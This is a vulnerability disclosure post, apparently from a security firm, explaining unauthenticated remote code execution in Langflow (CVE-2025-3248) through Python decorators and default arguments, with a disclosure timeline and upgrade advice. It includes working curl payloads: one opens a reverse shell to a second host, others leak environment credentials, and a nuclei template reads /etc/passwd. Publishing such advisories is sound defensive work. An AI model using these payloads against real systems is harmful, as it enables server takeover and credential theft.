TL;DR
We discovered an interesting code injection vulnerability, CVE-2025-3248, in Langflow, a popular tool used for building agentic AI workflows. This vulnerability is easily exploitable and enables unauthenticated remote attackers to fully compromise Langflow servers. The issue is patched in Langflow 1.3.0, and we encourage all users to upgrade to the latest version.
Note: We are choosing to publish full details now since an exploit has already been published for this vulnerability.
Background
“Agentic AI” is everywhere these days, and a vibrant ecosystem of AI tools has sprouted up around it. One of the more popular tools out there is Langflow, an open source project with 50K+ GitHub stars that is backed by DataStax and IBM.
Langflow is a Python based web application that provides a visual interface to build AI-driven agents and workflows.

There have been a few critical security vulnerabilities (CVE-2024-7297, CVE-2024-48061, CVE-2024-42835, CVE-2024-37014) reported in the past against Langflow, but these CVEs look questionable. Langflow provides “remote code execution as a feature” to any authenticated user because it allows users to modify and execute the Python code backing its visual components. It also by design does not support a sandbox for code execution. These CVEs seem to assume that Langflow has been configured without authentication or an attacker already has credentials.
We wanted to see what was possible as an unauthenticated attacker if Langflow is configured with authentication enabled, as most instances exposed to the Internet are.
A Bad Code Smell
Within a few minutes of looking at the source code, we identified something fishy: an unauthenticated API endpoint `/api/v1/validate/code` running Python `exec` on untrusted user input.
https://github.com/langflow-ai/langflow/blob/1.2.0/src/backend/base/langflow/utils/validate.py

But how does one actually exploit this? This isn’t a straight `exec` on user input. The code uses the `ast` module to parse user input and extracts any `ast.Import` and `ast.FunctionDef` nodes, i.e. any Python `import` statements and function definitions.
Imports are validated using `importlib.import_module`. This can’t be directly exploited unless an attacker can first upload an arbitrary Python file onto the file system within Python’s module search path. We didn’t find a way to do this.
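The validation pattern looks roughly like this. The sketch below is ours, not Langflow's exact implementation, but it shows why importing each module name is itself risky only if the attacker controls the module search path:

```python
import ast
import importlib


def validate_imports(code: str) -> None:
    """Parse the code and try to import each imported module name --
    a sketch of the validation pattern, not Langflow's exact code."""
    tree = ast.parse(code)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                # Actually imports the module, running its top-level code
                importlib.import_module(alias.name)


validate_imports("import json")  # resolves fine
try:
    validate_imports("import no_such_module_xyz")
except ImportError:
    print("import rejected")
```

Because `import_module` executes a module's top-level code, planting a malicious `.py` file on the search path would be enough, but we found no upload primitive.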
Function definitions are validated using `compile` and `exec`. A function definition is not the same as a function, though. Executing a function definition only makes the function available for execution within the current Python namespace; it doesn’t actually execute the function body. We tried polluting the current namespace by overwriting existing global and local function names but weren’t successful. Digging deeper…
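The distinction is easy to see in isolation. In this minimal example (ours, not Langflow's code), compiling and executing a definition binds the name without ever running the body:

```python
source = "def f():\n    raise RuntimeError('body ran')"
namespace = {}

# Executing the definition only binds 'f' in the namespace;
# the body never runs unless the function is actually called.
exec(compile(source, "<user input>", "exec"), namespace)

assert "f" in namespace  # the function now exists...
try:
    namespace["f"]()     # ...but its body only runs when called
except RuntimeError as e:
    print(e)             # body ran
```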
Diving into Python Decorators
What exactly is an `ast.FunctionDef`? In Python, function definitions also include the decorators attached to the function.

If you’ve worked with Python long enough, you’re probably familiar with decorators. Decorators are functions that return functions that wrap other functions. In Python web apps, they’re commonly used to implement authentication/authorization controls, such as `@login_required`. Here’s a simple example:
```python
# A simple decorator function
def decorator(func):
    def wrapper():
        print("Before calling the function.")
        func()
        print("After calling the function.")
    return wrapper

# Applying the decorator to a function
@decorator
def greet():
    print("Hello, World!")

greet()
```
Calling `greet` here is equivalent to calling the `wrapper` function returned by `decorator` and results in the following output:
```
Before calling the function.
Hello, World!
After calling the function.
```
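You can also see in the AST that decorator expressions are carried on the `FunctionDef` node itself, which is why they come along for the ride when the endpoint extracts function definitions (a quick illustration using the standard `ast` module):

```python
import ast

tree = ast.parse("@decorator\ndef greet():\n    pass")
fn = tree.body[0]
assert isinstance(fn, ast.FunctionDef)

# The decorator expression is part of the function definition node
assert len(fn.decorator_list) == 1
print(ast.dump(fn.decorator_list[0]))  # e.g. Name(id='decorator', ctx=Load())
```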
But decorators don’t have to be functions or return functions. Decorators are actually modeled as expressions, so arbitrary Python code can run where a decorator appears.
Let’s say you have a file called `foomodule.py` with the following code:

```python
@__import__("os").system("echo Inside foo decorator")
def foo():
    print("Inside foo function")
```

And in the same directory another file `main.py` with just the following line:

```python
import foomodule
```

And then you run `python main.py`:

The import of `foomodule` in `main.py` executes the function definition of `foo`, which executes the decorator, which in turn runs `os.system("echo Inside foo decorator")`, resulting in the output `Inside foo decorator`. The `foo` function itself is never called, as expected.
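One subtlety worth noting (our observation, not from the Langflow code): Python evaluates the decorator expression, then calls its result with the function being defined. If the result isn't callable, a `TypeError` follows, but only after the expression's side effects have already happened:

```python
executed = []

try:
    # The decorator expression runs as soon as the 'def' executes;
    # its return value (None) is then called with foo, raising TypeError.
    @executed.append("decorator expression ran")
    def foo():
        pass
except TypeError:
    pass  # too late: the side effect already happened

assert executed == ["decorator expression ran"]
```

The same applies to `os.system(...)` above, which returns an `int`; by the time anything complains, the payload has run.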
Abusing Decorators for Remote Code Execution
Remote code execution is easy now – just stick the payload into a decorator. Here’s an example of landing a Python reverse shell, targeting a vulnerable host at 10.0.220.200.
```shell
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n pass"}'
```

Interactive RCE
Interactive RCE is possible by raising an Exception from the decorator. For instance, the following will execute the `env` command and return the username and password of the Langflow superuser, assuming Langflow has been set up with authentication enabled:

```shell
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")\ndef foo():\n pass"}'
```
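Why this works: if the endpoint compiles and executes the submitted definition and echoes any resulting error back in the response (a sketch of the pattern, not Langflow's exact code), the raised exception carries the command output straight to the attacker:

```python
code = (
    "@exec(\"raise Exception('command output here')\")\n"
    "def foo():\n"
    "    pass"
)

try:
    # Executing the definition evaluates the decorator expression,
    # which raises with our smuggled payload as the message.
    exec(compile(code, "<user input>", "exec"), {})
    error = None
except Exception as e:
    error = str(e)

print(error)  # command output here
```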

Another Path to RCE: Python Default Arguments
After the CVE was published, another researcher published a POC that abused another feature of Python functions: default arguments. These are also modeled as expressions in Python and get executed when a function is defined.

So just as well, you can stick your payload into the default argument for a function:
```shell
curl -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code":"def foo(cmd=exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")):\n pass"}'
```
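The underlying behavior is easy to demonstrate on its own: default argument expressions are evaluated once, when the `def` statement executes, not when the function is called:

```python
evaluated = []


def side_effect():
    evaluated.append("default evaluated at definition time")


# The default expression runs as soon as this 'def' executes,
# even though foo itself is never called.
def foo(x=side_effect()):
    pass


assert evaluated == ["default evaluated at definition time"]
```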

Detection
Here’s a nuclei template that uses the interactive RCE to grab the `/etc/passwd` file on a vulnerable Langflow server:
```yaml
id: CVE-2025-3248

info:
  name: Langflow RCE
  author: nvn1729
  severity: critical
  description: This template exploits an unauth RCE in Langflow
  tags: python,injection,vulnerability,cve

requests:
  - raw:
      - |
        POST /api/v1/validate/code HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n pass"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
```
Remediation
We urge all users of Langflow to upgrade to at least version 1.3.0 or restrict network access to it. As of this writing, there are 500+ exposed instances of Langflow on the Internet, according to Censys.
The vulnerable code is present in the earliest versions of Langflow dating back two years, and from our testing it appears most, if not all, versions prior to 1.3.0 are exploitable. The patch puts the vulnerable endpoint behind authentication. Technically this vulnerability can still be exploited to escalate privileges from a regular user to a Langflow superuser, but that is already possible without this vulnerability too. We’re not really clear why Langflow distinguishes between superusers and regular users when all regular users can execute code on the server by design.
As a general practice, we recommend caution when exposing any recently developed AI tools to the Internet. If you must expose them externally, consider putting them in an isolated VPC and/or behind SSO. It only takes one errant/shadow IT deployment of these tools on some cloud instance to have a breach on your hands.
Timeline
- Feb. 22, 2025: Horizon3.ai reports issue to Langflow using GitHub security issue
- Feb. 24, 2025: Horizon3.ai raises regular GitHub issue asking maintainers to look at GitHub security issue
- Feb. 25, 2025: Horizon3.ai raises issue to DataStax through HackerOne as a fallback
- Feb. 26, 2025: Horizon3.ai raises issue to DataStax over email. DataStax acknowledges and says there will be an update on the GitHub security issue.
- Feb. 28, 2025: Support for exploit added to Horizon3’s NodeZero product
- Mar. 3, 2025: With no update on the GitHub security issue, Horizon3.ai follows up again with DataStax.
- Mar. 4, 2025: Pull request created to fix the issue.
- Mar. 5, 2025: PR merged
- Mar. 10, 2025: Horizon3.ai requests CVE from MITRE
- Mar. 17, 2025: HackerOne triages issues (already fixed at this point)
- Mar. 31, 2025: Langflow 1.3.0 released
- Apr. 1, 2025: Horizon3.ai follows up with MITRE for CVE
- Apr. 2, 2025: Horizon3.ai requests CVE from VulnCheck
- Apr. 3, 2025: VulnCheck assigns CVE-2025-3248
- Apr. 7, 2025: CVE-2025-3248 published, Horizon3.ai asks MITRE to cancel original CVE request
- Apr. 9, 2025: Third-party publishes exploit
- Apr. 9, 2025: This post
Shout out to VulnCheck for their timely response in getting a CVE assigned.
As usual, as with any zero-day, Horizon3’s NodeZero product had coverage for this vulnerability shortly after it was reported to the vendor.
References
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
- https://github.com/langflow-ai/langflow/pull/6911
- https://www.cve.org/cverecord?id=CVE-2025-3248